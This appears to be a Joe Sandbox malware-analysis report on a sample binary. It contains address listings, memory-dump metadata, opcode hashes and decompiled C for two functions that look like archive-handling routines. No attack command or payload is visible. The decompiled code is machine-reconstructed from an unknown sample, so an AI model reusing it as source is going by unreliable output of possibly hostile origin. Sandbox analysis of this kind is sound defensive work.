                                          0x0040287f
                                          0x00402882
                                          0x00402887
                                          0x0040288b
                                          0x0040288f
                                          0x0040289f
                                          0x004028a4
                                          0x004028cd
                                          0x004028d2
                                          0x004028d9
                                          0x004028de
                                          0x004028e1
                                          0x00402cc1
                                          0x00402cc3
                                          0x00402cc6
                                          0x00402ccb
                                          0x00402cd3
                                          0x00402cd8
                                          0x00402cd8
                                          0x00000000
                                          0x00402cd8
                                          0x004028e7
                                          0x004028eb
                                          0x004028ef
                                          0x004028fc
                                          0x00402900
                                          0x00402903
                                          0x00402905
                                          0x0040290e
                                          0x00402912
                                          0x00402919
                                          0x0040291e
                                          0x0040292a
                                          0x0040292d
                                          0x0040292d
                                          0x00402930
                                          0x0040293d
                                          0x00402940
                                          0x00402942
                                          0x00000000
                                          0x00000000
                                          0x00402944
                                          0x00402948
                                          0x0040294b
                                          0x0040294f
                                          0x00402956
                                          0x00402959
                                          0x00402966
                                          0x0040296d
                                          0x0040296f
                                          0x00402971
                                          0x004029a7
                                          0x004029ac
                                          0x004029ae
                                          0x004029b2
                                          0x004029b2
                                          0x004029b2
                                          0x004029b2
                                          0x004029b9
                                          0x004029bd
                                          0x004029c2
                                          0x004029d1
                                          0x004029d4
                                          0x004029d6
                                          0x00000000
                                          0x004029dc
                                          0x004029dc
                                          0x004029e0
                                          0x004029e2
                                          0x00402a00
                                          0x00402a03
                                          0x00402a06
                                          0x00402a08
                                          0x00402a0b
                                          0x00402a0b
                                          0x00402a11
                                          0x00402a16
                                          0x00402a1b
                                          0x00402a24
                                          0x00402a28
                                          0x00402a2d
                                          0x00402a30
                                          0x00402a45
                                          0x00402a4a
                                          0x00402a4d
                                          0x00402a51
                                          0x00402a56
                                          0x00402a56
                                          0x00402a5b
                                          0x00402a5e
                                          0x00402a60
                                          0x00402a63
                                          0x00402a6a
                                          0x00402a6b
                                          0x00402a6b
                                          0x00402a63
                                          0x00402a73
                                          0x00402a76
                                          0x00402a7a
                                          0x00402a7f
                                          0x00402a82
                                          0x00402a86
                                          0x00402ad0
                                          0x00402ad5
                                          0x00402ade
                                          0x00402ae2
                                          0x00402ae7
                                          0x00402ae9
                                          0x00402b72
                                          0x00402b72
                                          0x00402b75
                                          0x00402c6b
                                          0x00402c72
                                          0x00402c7d
                                          0x00402c85
                                          0x00402c8d
                                          0x00402c95
                                          0x00402c9b
                                          0x00402c9f
                                          0x00402ca7
                                          0x00402cab
                                          0x00402cb3
                                          0x00402cb7
                                          0x00000000
                                          0x00402cb7
                                          0x00402b7b
                                          0x00402b7d
                                          0x00402b82
                                          0x00402b85
                                          0x00402b98
                                          0x00402b98
                                          0x00402b87
                                          0x00402b87
                                          0x00402b8a
                                          0x00402b8e
                                          0x00402b94
                                          0x00402b94
                                          0x00402b9a
                                          0x00402b9c
                                          0x00402b9f
                                          0x00402ba2
                                          0x00402ba7
                                          0x00402ba7
                                          0x00402bad
                                          0x00402bb3
                                          0x00402bb9
                                          0x00402bbd
                                          0x00402bc0
                                          0x00402bc5
                                          0x00402bc7
                                          0x00402c58
                                          0x00402c60
                                          0x00402c64
                                          0x00402c66
                                          0x00000000
                                          0x00402bcd
                                          0x00402bd9
                                          0x00402bde
                                          0x00402be0
                                          0x00402be4
                                          0x00402be9
                                          0x00402be9
                                          0x00402bf2
                                          0x00402bfa
                                          0x00402c02
                                          0x00402c0a
                                          0x00402c14
                                          0x00402c18
                                          0x00402c20
                                          0x00402c24
                                          0x00402c2c
                                          0x00402c30
                                          0x00402c38
                                          0x00402c3d
                                          0x00402c45
                                          0x00402c4a
                                          0x00000000
                                          0x00402c4a
                                          0x00402bc7
                                          0x00402af2
                                          0x00402af7
                                          0x00402af9
                                          0x00000000
                                          0x00000000
                                          0x00402b07
                                          0x00402b12
                                          0x00402b1a
                                          0x00402b22
                                          0x00402b2a
                                          0x00402b2d
                                          0x00402b31
                                          0x00402b31
                                          0x00000000
                                          0x00402a88
                                          0x00402a88
                                          0x00402a91
                                          0x00402a96
                                          0x00402a99
                                          0x00402a9b
                                          0x00402aa7
                                          0x00402aaa
                                          0x00402a9d
                                          0x00402a9d
                                          0x00402a9d
                                          0x00402ab2
                                          0x00402aba
                                          0x00402ac0
                                          0x00402ac4
                                          0x00402b36
                                          0x00402b39
                                          0x00402b41
                                          0x00402b45
                                          0x00402b4a
                                          0x00402b4d
                                          0x00402b51
                                          0x00402b59
                                          0x00402b5e
                                          0x00402b66
                                          0x00402b6b
                                          0x00000000
                                          0x00402b6b
                                          0x00402a86
                                          0x00402a32
                                          0x00402a35
                                          0x00000000
                                          0x00402a35
                                          0x004029e4
                                          0x004029e7
                                          0x00000000
                                          0x00000000
                                          0x004029f0
                                          0x004029f3
                                          0x004029f6
                                          0x004029f8
                                          0x00000000
                                          0x004029f8
                                          0x004029d6
                                          0x00402976
                                          0x0040297a
                                          0x00402982
                                          0x00402986
                                          0x0040298e
                                          0x00402993
                                          0x0040299b
                                          0x004029a0
                                          0x00000000
                                          0x004029a0
                                          0x00402920
                                          0x00402920
                                          0x00000000
                                          0x00402920
                                          0x00402914
                                          0x00000000
                                          0x00402914
                                          0x00402907
                                          0x00402907
                                          0x00000000
                                          0x00402907
                                          0x004028a9
                                          0x004028af
                                          0x00000000
                                          0x004028af
                                          0x00402898
                                          0x00000000
                                          0x00402870
                                          0x00402870
                                          0x004028b4
                                          0x004028b4
                                          0x004028bb
                                          0x004028c0
                                          0x00402cda
                                          0x00402ce0
                                          0x00402ce8
                                          0x00402ce8
                                          0x0040286e
                                          0x00402832
                                          0x00000000

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00402812
                                            • Part of subcall function 00402D80: EnterCriticalSection.KERNEL32(?,?,?,004095B9), ref: 00402D85
                                            • Part of subcall function 00402D80: LeaveCriticalSection.KERNEL32(?,?,?,?,004095B9), ref: 00402D8F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterH_prologLeave
                                          • String ID:
                                          • API String ID: 367238759-0
                                          • Opcode ID: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                                          • Instruction ID: 6b86c84e82b28a82bfdc9d9b9477fa58d6923614df4f06b31c284573bb568367
                                          • Opcode Fuzzy Hash: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                                          • Instruction Fuzzy Hash: 14F1AD30900249DFCF14EFA5C989ADEBBB4AF54318F14806EE445B72E2DB789A45CF19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408A3B Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E00408A3B(intOrPtr __ecx) {
				intOrPtr _t181;
				signed int _t184;
				signed int* _t187;
				intOrPtr _t188;
				signed int* _t191;
				signed int* _t193;
				void* _t194;
				signed int* _t195;
				void* _t197;
				signed int* _t198;
				void* _t200;
				signed int* _t201;
				intOrPtr _t205;
				signed int* _t207;
				signed int* _t208;
				signed int* _t209;
				intOrPtr* _t213;
				intOrPtr* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t220;
				signed int* _t222;
				signed int* _t223;
				signed int* _t224;
				intOrPtr* _t232;
				signed int* _t234;
				signed int* _t235;
				signed int* _t236;
				intOrPtr* _t243;
				signed int* _t245;
				signed int* _t246;
				signed int* _t247;
				intOrPtr _t255;
				signed int _t266;
				signed int _t307;
				signed int _t313;
				intOrPtr _t317;
				signed int** _t319;
				intOrPtr _t320;
				void* _t322;

				E00413954(E00419B47, _t322);
				_push(_t313);
				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
				E00408A27(__ecx);
				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
					while(1) {
						_t317 =  *((intOrPtr*)(_t322 + 0xc));
						_t307 = 1;
						_t313 = _t313 | 0xffffffff;
						_t181 =  *((intOrPtr*)(_t317 + 8));
						 *(_t322 - 0x24) = _t313;
						if(_t181 < _t307) {
							goto L6;
						}
						L4:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= _t181) {
							L76:
							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
							_t184 = 0;
							goto L77;
						}
						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
						L7:
						if(_t266 != 0) {
							 *(_t322 - 0x38) = 0;
							 *((short*)(_t322 - 0x36)) = 0;
							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
							_t187 =  *_t319;
							 *(_t322 - 4) = _t307;
							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
							if(_t188 != 0) {
								L35:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t320 = _t188;
								E00405E34(_t322 - 0x38);
								L71:
								_t184 = _t320;
								goto L77;
							}
							if( *(_t322 - 0x38) != 0x13) {
								L75:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t266 = _t322 - 0x38;
								E00405E34(_t266);
								goto L76;
							}
							_t191 =  *_t319;
							_t313 =  *(_t322 - 0x30);
							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
							if(_t188 != 0) {
								goto L35;
							}
							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
								goto L75;
							}
							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
							E00405E34(_t322 - 0x38);
							 *(_t322 - 0x10) = 0;
							_t193 =  *_t319;
							_t266 =  *_t193;
							 *(_t322 - 4) = 2;
							_t194 =  *_t266(_t193, 0x41b228, _t322 - 0x10);
							_t195 =  *(_t322 - 0x10);
							if(_t194 != 0 || _t195 == 0) {
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								goto L52;
							} else {
								 *(_t322 - 0x14) = 0;
								_t266 =  *_t195;
								 *(_t322 - 4) = 3;
								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
								_t198 =  *(_t322 - 0x14);
								if(_t197 != 0 || _t198 == 0) {
									 *(_t322 - 4) = 2;
									goto L49;
								} else {
									 *(_t322 - 0x18) = 0;
									_t266 =  *_t198;
									 *(_t322 - 4) = 4;
									_t200 =  *_t266(_t198, 0x41b2f8, _t322 - 0x18);
									_t201 =  *(_t322 - 0x18);
									if(_t200 != 0 || _t201 == 0) {
										 *(_t322 - 4) = 3;
										goto L46;
									} else {
										E00408EA0(_t322 - 0x78);
										_push(_t322 - 0x74);
										_push(_t313);
										 *(_t322 - 4) = 5;
										_t205 = E0040836D(_t319);
										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
										if(_t205 != 0) {
											 *(_t322 - 4) = 4;
											E004038C2(_t322 - 0x78);
											_t207 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t207 != 0) {
												 *((intOrPtr*)( *_t207 + 8))(_t207);
											}
											_t208 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t208 != 0) {
												 *((intOrPtr*)( *_t208 + 8))(_t208);
											}
											_t209 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t209 != 0) {
												 *((intOrPtr*)( *_t209 + 8))(_t209);
											}
											_t184 =  *((intOrPtr*)(_t322 - 0x28));
											goto L77;
										}
										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
										 *(_t322 - 4) = 6;
										 *((intOrPtr*)( *_t213))(_t213, 0x41b218, _t322 - 0x1c);
										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
										if(_t215 != 0) {
											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
										}
										 *(_t322 - 0x58) = _t313;
										_t216 = E00408524(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
										if(_t216 == 1) {
											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t217 != 0) {
												 *((intOrPtr*)( *_t217 + 8))(_t217);
											}
											_t266 = _t322 - 0x78;
											 *(_t322 - 4) = 4;
											E004038C2(_t266);
											_t201 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											L46:
											if(_t201 != 0) {
												_t266 =  *_t201;
												 *((intOrPtr*)(_t266 + 8))(_t201);
											}
											_t198 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											L49:
											if(_t198 != 0) {
												_t266 =  *_t198;
												 *((intOrPtr*)(_t266 + 8))(_t198);
											}
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											_t195 =  *(_t322 - 0x10);
											L52:
											if(_t195 != 0) {
												_t266 =  *_t195;
												 *((intOrPtr*)(_t266 + 8))(_t195);
											}
											goto L76;
										} else {
											if(_t216 != 0) {
												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t220 != 0) {
													 *((intOrPtr*)( *_t220 + 8))(_t220);
												}
												 *(_t322 - 4) = 4;
												E004038C2(_t322 - 0x78);
												_t222 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t222 != 0) {
													 *((intOrPtr*)( *_t222 + 8))(_t222);
												}
												_t223 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t223 != 0) {
													 *((intOrPtr*)( *_t223 + 8))(_t223);
												}
												_t224 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t224 != 0) {
													 *((intOrPtr*)( *_t224 + 8))(_t224);
												}
												_t184 =  *((intOrPtr*)(_t322 - 0x28));
												goto L77;
											}
											_push(_t322 - 0x4c);
											_push(_t322 - 0x54);
											_push(_t313);
											_t320 = E0040848C(_t319);
											if(_t320 != 0) {
												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t232 != 0) {
													 *((intOrPtr*)( *_t232 + 8))(_t232);
												}
												 *(_t322 - 4) = 4;
												E004038C2(_t322 - 0x78);
												_t234 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t234 != 0) {
													 *((intOrPtr*)( *_t234 + 8))(_t234);
												}
												_t235 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t235 != 0) {
													 *((intOrPtr*)( *_t235 + 8))(_t235);
												}
												_t236 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t236 != 0) {
													 *((intOrPtr*)( *_t236 + 8))(_t236);
												}
												goto L71;
											}
											_push(_t322 - 0x78);
											E004093F0( *((intOrPtr*)(_t322 - 0x20)));
											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t243 != 0) {
												 *((intOrPtr*)( *_t243 + 8))(_t243);
											}
											 *(_t322 - 4) = 4;
											E004038C2(_t322 - 0x78);
											_t245 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t245 != 0) {
												 *((intOrPtr*)( *_t245 + 8))(_t245);
											}
											_t246 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t246 != 0) {
												 *((intOrPtr*)( *_t246 + 8))(_t246);
											}
											_t247 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t247 != 0) {
												 *((intOrPtr*)( *_t247 + 8))(_t247);
											}
											while(1) {
												_t317 =  *((intOrPtr*)(_t322 + 0xc));
												_t307 = 1;
												_t313 = _t313 | 0xffffffff;
												_t181 =  *((intOrPtr*)(_t317 + 8));
												 *(_t322 - 0x24) = _t313;
												if(_t181 < _t307) {
													goto L6;
												}
												goto L4;
											}
										}
									}
								}
							}
						}
						E00408EA0(_t322 - 0xb4);
						 *(_t322 - 4) = 0;
						E00401D7A(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
						 *(_t322 - 0x94) = _t313;
						_t255 = E00408902(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
						_t320 = _t255;
						if(_t320 != 0) {
							 *(_t322 - 4) = _t313;
							E004038C2(_t322 - 0xb4);
							goto L71;
						}
						_push(_t322 - 0xb4);
						E004093F0( *((intOrPtr*)(_t322 - 0x20)));
						 *(_t322 - 4) = _t313;
						E004038C2(_t322 - 0xb4);
						continue;
						L6:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= 0x20) {
							goto L76;
						}
						goto L7;
					}
				} else {
					_t184 = 0x80004001;
					L77:
					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
					return _t184;
				}
			}











































                                          0x00408a40
                                          0x00408a4d
                                          0x00408a4e
                                          0x00408a51
                                          0x00408a5f
                                          0x00408a6d
                                          0x00408a6d
                                          0x00408a72
                                          0x00408a73
                                          0x00408a76
                                          0x00408a79
                                          0x00408a7e
                                          0x00000000
                                          0x00000000
                                          0x00408a80
                                          0x00408a83
                                          0x00408a88
                                          0x00408e81
                                          0x00408e8a
                                          0x00408e8d
                                          0x00000000
                                          0x00408e8d
                                          0x00408a97
                                          0x00408aab
                                          0x00408aad
                                          0x00408b1a
                                          0x00408b1e
                                          0x00408b25
                                          0x00408b29
                                          0x00408b33
                                          0x00408b36
                                          0x00408b3b
                                          0x00408cfb
                                          0x00408cfb
                                          0x00408d02
                                          0x00408d04
                                          0x00408e56
                                          0x00408e56
                                          0x00000000
                                          0x00408e56
                                          0x00408b46
                                          0x00408e75
                                          0x00408e75
                                          0x00408e79
                                          0x00408e7c
                                          0x00000000
                                          0x00408e7c
                                          0x00408b4c
                                          0x00408b4e
                                          0x00408b58
                                          0x00408b5d
                                          0x00000000
                                          0x00000000
                                          0x00408b66
                                          0x00000000
                                          0x00000000
                                          0x00408b6c
                                          0x00408b73
                                          0x00408b78
                                          0x00408b7b
                                          0x00408b86
                                          0x00408b89
                                          0x00408b90
                                          0x00408b94
                                          0x00408b97
                                          0x00408e6c
                                          0x00000000
                                          0x00408ba5
                                          0x00408ba5
                                          0x00408ba8
                                          0x00408bb0
                                          0x00408bb4
                                          0x00408bb9
                                          0x00408bbc
                                          0x00408e63
                                          0x00000000
                                          0x00408bca
                                          0x00408bca
                                          0x00408bcd
                                          0x00408bd9
                                          0x00408bdd
                                          0x00408be1
                                          0x00408be4
                                          0x00408e5a
                                          0x00000000
                                          0x00408bf2
                                          0x00408bf5
                                          0x00408bff
                                          0x00408c00
                                          0x00408c01
                                          0x00408c05
                                          0x00408c0c
                                          0x00408c0f
                                          0x00408d11
                                          0x00408d15
                                          0x00408d1a
                                          0x00408d1d
                                          0x00408d23
                                          0x00408d28
                                          0x00408d28
                                          0x00408d2b
                                          0x00408d2e
                                          0x00408d34
                                          0x00408d39
                                          0x00408d39
                                          0x00408d3c
                                          0x00408d3f
                                          0x00408d45
                                          0x00408d4a
                                          0x00408d4a
                                          0x00408d4d
                                          0x00000000
                                          0x00408d4d
                                          0x00408c15
                                          0x00408c18
                                          0x00408c27
                                          0x00408c2b
                                          0x00408c2d
                                          0x00408c32
                                          0x00408c3a
                                          0x00408c3a
                                          0x00408c43
                                          0x00408c50
                                          0x00408c58
                                          0x00408c5b
                                          0x00408d55
                                          0x00408d58
                                          0x00408d5e
                                          0x00408d63
                                          0x00408d63
                                          0x00408d66
                                          0x00408d69
                                          0x00408d6d
                                          0x00408d72
                                          0x00408d75
                                          0x00408d79
                                          0x00408d7b
                                          0x00408d7d
                                          0x00408d80
                                          0x00408d80
                                          0x00408d83
                                          0x00408d86
                                          0x00408d8a
                                          0x00408d8c
                                          0x00408d8e
                                          0x00408d91
                                          0x00408d91
                                          0x00408d94
                                          0x00408d98
                                          0x00408d9b
                                          0x00408d9d
                                          0x00408da3
                                          0x00408da6
                                          0x00408da6
                                          0x00000000
                                          0x00408c61
                                          0x00408c63
                                          0x00408dae
                                          0x00408db1
                                          0x00408db7
                                          0x00408dbc
                                          0x00408dbc
                                          0x00408dc2
                                          0x00408dc6
                                          0x00408dcb
                                          0x00408dce
                                          0x00408dd4
                                          0x00408dd9
                                          0x00408dd9
                                          0x00408ddc
                                          0x00408ddf
                                          0x00408de5
                                          0x00408dea
                                          0x00408dea
                                          0x00408ded
                                          0x00408df0
                                          0x00408df6
                                          0x00408dfb
                                          0x00408dfb
                                          0x00408dfe
                                          0x00000000
                                          0x00408dfe
                                          0x00408c6e
                                          0x00408c72
                                          0x00408c73
                                          0x00408c79
                                          0x00408c7d
                                          0x00408e06
                                          0x00408e09
                                          0x00408e0f
                                          0x00408e14
                                          0x00408e14
                                          0x00408e1a
                                          0x00408e1e
                                          0x00408e23
                                          0x00408e26
                                          0x00408e2c
                                          0x00408e31
                                          0x00408e31
                                          0x00408e34
                                          0x00408e37
                                          0x00408e3d
                                          0x00408e42
                                          0x00408e42
                                          0x00408e45
                                          0x00408e48
                                          0x00408e4e
                                          0x00408e53
                                          0x00408e53
                                          0x00000000
                                          0x00408e4e
                                          0x00408c89
                                          0x00408c8a
                                          0x00408c8f
                                          0x00408c92
                                          0x00408c98
                                          0x00408c9d
                                          0x00408c9d
                                          0x00408ca3
                                          0x00408ca7
                                          0x00408cac
                                          0x00408caf
                                          0x00408cb5
                                          0x00408cba
                                          0x00408cba
                                          0x00408cbd
                                          0x00408cc0
                                          0x00408cc6
                                          0x00408ccb
                                          0x00408ccb
                                          0x00408cce
                                          0x00408cd1
                                          0x00408cd7
                                          0x00408ce0
                                          0x00408ce0
                                          0x00408a6d
                                          0x00408a6d
                                          0x00408a72
                                          0x00408a73
                                          0x00408a76
                                          0x00408a79
                                          0x00408a7e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00408a7e
                                          0x00408a6d
                                          0x00408c5b
                                          0x00408be4
                                          0x00408bbc
                                          0x00408b97
                                          0x00408ab5
                                          0x00408ac3
                                          0x00408ac6
                                          0x00408ad4
                                          0x00408ae6
                                          0x00408aeb
                                          0x00408aef
                                          0x00408cee
                                          0x00408cf1
                                          0x00000000
                                          0x00408cf1
                                          0x00408afe
                                          0x00408aff
                                          0x00408b0a
                                          0x00408b0d
                                          0x00000000
                                          0x00408a9c
                                          0x00408a9f
                                          0x00408aa5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00408aa5
                                          0x00408a61
                                          0x00408a61
                                          0x00408e8f
                                          0x00408e95
                                          0x00408e9d
                                          0x00408e9d

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                                          • Instruction ID: 34c7193a5b50bb33ce0ba2a09d23f7b106f418ab12413814a78bbf0ce5505d58
                                          • Opcode Fuzzy Hash: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                                          • Instruction Fuzzy Hash: 62E17F70A00249DFCF10DFA4C988AAEBBB4AF58314F2445AEE495F72D1CB389E45CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040EA0B Relevance: 1.8, APIs: 1, Instructions: 255COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E0040EA0B(intOrPtr* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _t191;
				intOrPtr* _t197;
				intOrPtr _t202;
				void* _t220;
				void* _t227;
				intOrPtr _t267;
				signed int _t271;
				intOrPtr* _t273;
				intOrPtr* _t277;
				intOrPtr* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t289;

				_t289 = __eflags;
				_t271 = __edx;
				E00413954(E0041A72D, _t284);
				_t273 = __ecx;
				E004032A8(_t284 - 0x5c, 8);
				 *((intOrPtr*)(_t284 - 0x5c)) = 0x41b694;
				 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
				E004032A8(_t284 - 0xd8, 1);
				 *((intOrPtr*)(_t284 - 0xd8)) = 0x41b748;
				E004032A8(_t284 - 0xc4, 4);
				 *((intOrPtr*)(_t284 - 0xc4)) = 0x41b684;
				 *(_t284 - 4) = 2;
				E00402155(_t284 - 0x30);
				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
				E004032A8(_t284 - 0x84, 4);
				 *((intOrPtr*)(_t284 - 0x84)) = 0x41b684;
				E004032A8(_t284 - 0x9c, 8);
				 *((intOrPtr*)(_t284 - 0x9c)) = 0x41b694;
				E004032A8(_t284 - 0xb0, 1);
				 *((intOrPtr*)(_t284 - 0xb0)) = 0x41b748;
				E004032A8(_t284 - 0x70, 4);
				 *((intOrPtr*)(_t284 - 0x70)) = 0x41b684;
				_t277 =  *((intOrPtr*)(_t284 + 0x10));
				 *(_t284 - 4) = 7;
				E0040E86B(__ecx, __edx, 0, _t277, _t284 - 0x5c, _t284 - 0xd8, _t284 - 0xc4, _t284 - 0x30, _t284 - 0x84, _t284 - 0x9c, _t284 - 0xb0, _t284 - 0x70);
				 *(_t284 - 0x14) =  *(_t284 - 0x14) & 0x00000000;
				E0040AC6A(_t284 - 0x164, _t289, 1);
				_t227 =  *_t277 +  *((intOrPtr*)(_t284 + 8));
				asm("adc esi, [ebp+0xc]");
				 *(_t284 + 0xc) =  *(_t284 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t284 - 0x34)) =  *((intOrPtr*)(_t277 + 4));
				if( *((intOrPtr*)(_t284 - 0x28)) <= 0) {
					L17:
					 *(_t284 - 4) = 7;
					E0040C380(_t284 - 0x164, _t301); // executed
					 *(_t284 - 4) = 6;
					E004042AD(_t284 - 0x70);
					 *(_t284 - 4) = 5;
					E004042AD(_t284 - 0xb0);
					 *(_t284 - 4) = 4;
					E004042AD(_t284 - 0x9c);
					 *(_t284 - 4) = 3;
					E004042AD(_t284 - 0x84);
					 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
					 *(_t284 - 4) = 0xc;
					_t279 = 0;
					L18:
					E004042D6();
					 *(_t284 - 4) = 2;
					E004042AD(_t284 - 0x30);
					 *(_t284 - 4) = 1;
					E004042AD(_t284 - 0xc4);
					 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
					E004042AD(_t284 - 0xd8);
					 *(_t284 - 4) =  *(_t284 - 4) | 0xffffffff;
					E004042AD(_t284 - 0x5c);
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0xc));
					return _t279;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					 *(_t284 - 0x40) =  *(_t284 - 0x40) & 0x00000000;
					 *(_t284 - 0x3c) =  *(_t284 - 0x3c) & 0x00000000;
					 *((intOrPtr*)(_t284 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t284 - 0x24)) +  *(_t284 + 0xc) * 4));
					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
					_push(_t284 - 0x44);
					 *(_t284 - 4) = 9;
					E0040FA43( *((intOrPtr*)(_t284 + 0x14)));
					 *(_t284 - 4) = 8;
					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
					E00403A9C( *(_t284 - 0x3c));
					_t191 =  *((intOrPtr*)(_t284 + 0x14));
					_t282 =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
					 *(_t284 - 0x10) =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
